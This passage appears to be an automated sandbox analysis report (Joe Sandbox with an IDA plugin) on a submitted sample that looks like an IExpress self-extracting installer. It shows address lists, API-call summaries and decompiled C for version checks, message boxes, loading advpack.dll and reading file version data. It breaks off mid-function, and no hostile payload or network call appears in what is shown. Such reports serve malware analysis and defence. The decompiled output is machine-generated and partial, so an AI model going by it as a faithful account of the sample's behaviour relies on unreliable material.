                                                                                                                                                                                                        0x000c37db
                                                                                                                                                                                                        0x000c37e8
                                                                                                                                                                                                        0x000c37ea
                                                                                                                                                                                                        0x000c37ea
                                                                                                                                                                                                        0x000c37ea
                                                                                                                                                                                                        0x000c37f0
                                                                                                                                                                                                        0x000c37f6
                                                                                                                                                                                                        0x000c3805
                                                                                                                                                                                                        0x000c3817
                                                                                                                                                                                                        0x000c382b
                                                                                                                                                                                                        0x000c3830
                                                                                                                                                                                                        0x000c3836
                                                                                                                                                                                                        0x000c383b
                                                                                                                                                                                                        0x000c383d
                                                                                                                                                                                                        0x000c38eb
                                                                                                                                                                                                        0x000c38eb
                                                                                                                                                                                                        0x000c38f2
                                                                                                                                                                                                        0x000c390c
                                                                                                                                                                                                        0x000c3911
                                                                                                                                                                                                        0x000c3911
                                                                                                                                                                                                        0x000c3913
                                                                                                                                                                                                        0x000c394d
                                                                                                                                                                                                        0x000c394d
                                                                                                                                                                                                        0x000c394f
                                                                                                                                                                                                        0x000c38a9
                                                                                                                                                                                                        0x000c38a9
                                                                                                                                                                                                        0x000c38b0
                                                                                                                                                                                                        0x000c38b2
                                                                                                                                                                                                        0x000c38b9
                                                                                                                                                                                                        0x000c38bb
                                                                                                                                                                                                        0x000c38c1
                                                                                                                                                                                                        0x000c3975
                                                                                                                                                                                                        0x000c38c7
                                                                                                                                                                                                        0x000c38de
                                                                                                                                                                                                        0x000c38e0
                                                                                                                                                                                                        0x000c38e0
                                                                                                                                                                                                        0x000c397b
                                                                                                                                                                                                        0x000c397d
                                                                                                                                                                                                        0x000c39a9
                                                                                                                                                                                                        0x000c397f
                                                                                                                                                                                                        0x000c3982
                                                                                                                                                                                                        0x000c398b
                                                                                                                                                                                                        0x000c398d
                                                                                                                                                                                                        0x000c398f
                                                                                                                                                                                                        0x000c399f
                                                                                                                                                                                                        0x000c39a1
                                                                                                                                                                                                        0x000c3991
                                                                                                                                                                                                        0x000c3991
                                                                                                                                                                                                        0x000c3991
                                                                                                                                                                                                        0x000c398f
                                                                                                                                                                                                        0x000c39af
                                                                                                                                                                                                        0x000c39b6
                                                                                                                                                                                                        0x000c3a0f
                                                                                                                                                                                                        0x000c3a0f
                                                                                                                                                                                                        0x000c3a11
                                                                                                                                                                                                        0x000c3a13
                                                                                                                                                                                                        0x000c3a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c39b8
                                                                                                                                                                                                        0x000c39b8
                                                                                                                                                                                                        0x000c39ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c39bc
                                                                                                                                                                                                        0x000c39bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c39c3
                                                                                                                                                                                                        0x000c39c9
                                                                                                                                                                                                        0x000c39ce
                                                                                                                                                                                                        0x000c39d0
                                                                                                                                                                                                        0x000c39e3
                                                                                                                                                                                                        0x000c39e5
                                                                                                                                                                                                        0x000c39e6
                                                                                                                                                                                                        0x000c39f1
                                                                                                                                                                                                        0x000c39f7
                                                                                                                                                                                                        0x000c39fa
                                                                                                                                                                                                        0x000c3a01
                                                                                                                                                                                                        0x000c3a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3a06
                                                                                                                                                                                                        0x000c3a09
                                                                                                                                                                                                        0x000c3a09
                                                                                                                                                                                                        0x000c3a0b
                                                                                                                                                                                                        0x000c3a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3a09
                                                                                                                                                                                                        0x000c39fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c39fc
                                                                                                                                                                                                        0x000c39d3
                                                                                                                                                                                                        0x000c39d8
                                                                                                                                                                                                        0x000c39da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c39dc
                                                                                                                                                                                                        0x000c39b6
                                                                                                                                                                                                        0x000c3955
                                                                                                                                                                                                        0x000c395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3961
                                                                                                                                                                                                        0x000c3963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3969
                                                                                                                                                                                                        0x000c3969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3969
                                                                                                                                                                                                        0x000c3915
                                                                                                                                                                                                        0x000c3915
                                                                                                                                                                                                        0x000c391b
                                                                                                                                                                                                        0x000c391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c392d
                                                                                                                                                                                                        0x000c3933
                                                                                                                                                                                                        0x000c3938
                                                                                                                                                                                                        0x000c393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3940
                                                                                                                                                                                                        0x000c3946
                                                                                                                                                                                                        0x000c394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38f2
                                                                                                                                                                                                        0x000c3843
                                                                                                                                                                                                        0x000c3845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c384b
                                                                                                                                                                                                        0x000c384d
                                                                                                                                                                                                        0x000c3883
                                                                                                                                                                                                        0x000c3885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c389a
                                                                                                                                                                                                        0x000c389e
                                                                                                                                                                                                        0x000c389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38a0
                                                                                                                                                                                                        0x000c38a0
                                                                                                                                                                                                        0x000c38a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38a4
                                                                                                                                                                                                        0x000c384f
                                                                                                                                                                                                        0x000c3851
                                                                                                                                                                                                        0x000c3857
                                                                                                                                                                                                        0x000c386e
                                                                                                                                                                                                        0x000c3877
                                                                                                                                                                                                        0x000c387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3881
                                                                                                                                                                                                        0x000c3859
                                                                                                                                                                                                        0x000c385c
                                                                                                                                                                                                        0x000c3862
                                                                                                                                                                                                        0x000c3866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c38f4
                                                                                                                                                                                                        0x000c38f4
                                                                                                                                                                                                        0x000c38f5
                                                                                                                                                                                                        0x000c38fb
                                                                                                                                                                                                        0x000c3901
                                                                                                                                                                                                        0x000c3901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c390a
                                                                                                                                                                                                        0x000c374b
                                                                                                                                                                                                        0x000c374e
                                                                                                                                                                                                        0x000c375c
                                                                                                                                                                                                        0x000c3764
                                                                                                                                                                                                        0x000c3769
                                                                                                                                                                                                        0x000c376e
                                                                                                                                                                                                        0x000c3771
                                                                                                                                                                                                        0x000c379c
                                                                                                                                                                                                        0x000c379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c37a3
                                                                                                                                                                                                        0x000c37a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c37a4
                                                                                                                                                                                                        0x000c3773
                                                                                                                                                                                                        0x000c3777
                                                                                                                                                                                                        0x000c3778
                                                                                                                                                                                                        0x000c377f
                                                                                                                                                                                                        0x000c3781
                                                                                                                                                                                                        0x000c378e
                                                                                                                                                                                                        0x000c378e
                                                                                                                                                                                                        0x000c3794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3794
                                                                                                                                                                                                        0x000c3783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3785
                                                                                                                                                                                                        0x000c378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c378c
                                                                                                                                                                                                        0x000c3750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c372d
                                                                                                                                                                                                        0x000c372d
                                                                                                                                                                                                        0x000c396b
                                                                                                                                                                                                        0x000c396b
                                                                                                                                                                                                        0x000c396c
                                                                                                                                                                                                        0x000c396e
                                                                                                                                                                                                        0x000c396f
                                                                                                                                                                                                        0x000c3a1e
                                                                                                                                                                                                        0x000c3a1e
                                                                                                                                                                                                        0x000c3a22
                                                                                                                                                                                                        0x000c3a27
                                                                                                                                                                                                        0x000c3a3e
                                                                                                                                                                                                        0x000c3a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 000C3723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 000C39C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 000C39F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$cent
                                                                                                                                                                                                        • API String ID: 2519184315-3438608206
                                                                                                                                                                                                        • Opcode ID: c00205e30bef6571732080c78e023357869794dbe87ffee57315f8a282b4868c
                                                                                                                                                                                                        • Instruction ID: 417a21af46cda3275e7952c0d856a9990922724e4f544d087be7b4ececf2d335
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c00205e30bef6571732080c78e023357869794dbe87ffee57315f8a282b4868c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9891E371A212249FEBB48B15CC81FEEB7F0EB45304F1581ADD84A9B291DB758F80CB42
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E000C6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E000C1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E000C658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x000c6495
                                                                                                                                                                                                        0x000c6495
                                                                                                                                                                                                        0x000c64a0
                                                                                                                                                                                                        0x000c64a7
                                                                                                                                                                                                        0x000c64ab
                                                                                                                                                                                                        0x000c64bd
                                                                                                                                                                                                        0x000c64c2
                                                                                                                                                                                                        0x000c64d3
                                                                                                                                                                                                        0x000c64df
                                                                                                                                                                                                        0x000c64e8
                                                                                                                                                                                                        0x000c6502
                                                                                                                                                                                                        0x000c64ee
                                                                                                                                                                                                        0x000c64f9
                                                                                                                                                                                                        0x000c64f9
                                                                                                                                                                                                        0x000c6516

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000C64DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000C64F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 000C6502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-875882553
                                                                                                                                                                                                        • Opcode ID: 36974e4effcdfd2f305b285f8be0da25b44b1ed98814157bc0de30616f1749f7
                                                                                                                                                                                                        • Instruction ID: 17a0ac516a7ccb91c07c8ad61960dd218f4b1528952aa0ede1aba1fa880e289d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36974e4effcdfd2f305b285f8be0da25b44b1ed98814157bc0de30616f1749f7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E01F430A04108ABEB60EB64DC49FEE7378EB56314F60029DF985931C1DF75AE8ACB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E000C2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E000C2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E000C2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x000c28f1
                                                                                                                                                                                                        0x000c28f4
                                                                                                                                                                                                        0x000c28f7
                                                                                                                                                                                                        0x000c28f9
                                                                                                                                                                                                        0x000c28fc
                                                                                                                                                                                                        0x000c28ff
                                                                                                                                                                                                        0x000c2901
                                                                                                                                                                                                        0x000c2907
                                                                                                                                                                                                        0x000c2a62
                                                                                                                                                                                                        0x000c2a64
                                                                                                                                                                                                        0x000c290d
                                                                                                                                                                                                        0x000c290d
                                                                                                                                                                                                        0x000c290f
                                                                                                                                                                                                        0x000c2912
                                                                                                                                                                                                        0x000c2920
                                                                                                                                                                                                        0x000c2937
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2944
                                                                                                                                                                                                        0x000c294a
                                                                                                                                                                                                        0x000c294f
                                                                                                                                                                                                        0x000c2a2f
                                                                                                                                                                                                        0x000c2a32
                                                                                                                                                                                                        0x000c2a34
                                                                                                                                                                                                        0x000c2a37
                                                                                                                                                                                                        0x000c2a41
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2955
                                                                                                                                                                                                        0x000c295e
                                                                                                                                                                                                        0x000c2962
                                                                                                                                                                                                        0x000c2969
                                                                                                                                                                                                        0x000c296f
                                                                                                                                                                                                        0x000c2974
                                                                                                                                                                                                        0x000c298c
                                                                                                                                                                                                        0x000c2a20
                                                                                                                                                                                                        0x000c2a21
                                                                                                                                                                                                        0x000c2a27
                                                                                                                                                                                                        0x000c2a4c
                                                                                                                                                                                                        0x000c2a4f
                                                                                                                                                                                                        0x000c2a50
                                                                                                                                                                                                        0x000c2a53
                                                                                                                                                                                                        0x000c2a56
                                                                                                                                                                                                        0x000c2a5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c29b2
                                                                                                                                                                                                        0x000c29b2
                                                                                                                                                                                                        0x000c29b5
                                                                                                                                                                                                        0x000c29bd
                                                                                                                                                                                                        0x000c29c3
                                                                                                                                                                                                        0x000c29cc
                                                                                                                                                                                                        0x000c29d5
                                                                                                                                                                                                        0x000c29d7
                                                                                                                                                                                                        0x000c29da
                                                                                                                                                                                                        0x000c29dd
                                                                                                                                                                                                        0x000c29df
                                                                                                                                                                                                        0x000c29ec
                                                                                                                                                                                                        0x000c29f8
                                                                                                                                                                                                        0x000c29fc
                                                                                                                                                                                                        0x000c29ff
                                                                                                                                                                                                        0x000c2a02
                                                                                                                                                                                                        0x000c2a07
                                                                                                                                                                                                        0x000c2a0a
                                                                                                                                                                                                        0x000c2a0f
                                                                                                                                                                                                        0x000c2a19
                                                                                                                                                                                                        0x000c2a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2a0f
                                                                                                                                                                                                        0x000c298c
                                                                                                                                                                                                        0x000c2974
                                                                                                                                                                                                        0x000c2962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c294f
                                                                                                                                                                                                        0x000c2912
                                                                                                                                                                                                        0x000c2a65
                                                                                                                                                                                                        0x000c2a68
                                                                                                                                                                                                        0x000c2a6c
                                                                                                                                                                                                        0x000c2a6f
                                                                                                                                                                                                        0x000c2a6f
                                                                                                                                                                                                        0x000c2a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 000C2A6F
                                                                                                                                                                                                          • Part of subcall function 000C2773: CharUpperA.USER32(374600BF,00000000,00000000,00000000), ref: 000C27A8
                                                                                                                                                                                                          • Part of subcall function 000C2773: CharNextA.USER32(0000054D), ref: 000C27B5
                                                                                                                                                                                                          • Part of subcall function 000C2773: CharNextA.USER32(00000000), ref: 000C27BC
                                                                                                                                                                                                          • Part of subcall function 000C2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2829
                                                                                                                                                                                                          • Part of subcall function 000C2773: RegQueryValueExA.ADVAPI32(?,000C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2852
                                                                                                                                                                                                          • Part of subcall function 000C2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2870
                                                                                                                                                                                                          • Part of subcall function 000C2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C28A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,000C3938,?,?,?,?,-00000005), ref: 000C2958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 000C2969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,000C3938,?,?,?,?,-00000005,?), ref: 000C2A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 000C2A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: 8fdd70561b634782757cdce497dfd13eecdd5172e35ebc487108a28af654e00f
                                                                                                                                                                                                        • Instruction ID: 3c5543a25f3ff4886c5e23bd59ece5988ee675ca8219597c47caca49d23b65e3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fdd70561b634782757cdce497dfd13eecdd5172e35ebc487108a28af654e00f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96513631E00219EBDB21CF99C884EAEBBB5FF48714F14412EE905E3651DB359A41DBA2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E000C4169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E000C468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E000C468F("FINISHMSG", _t21, _t20) != 0) {
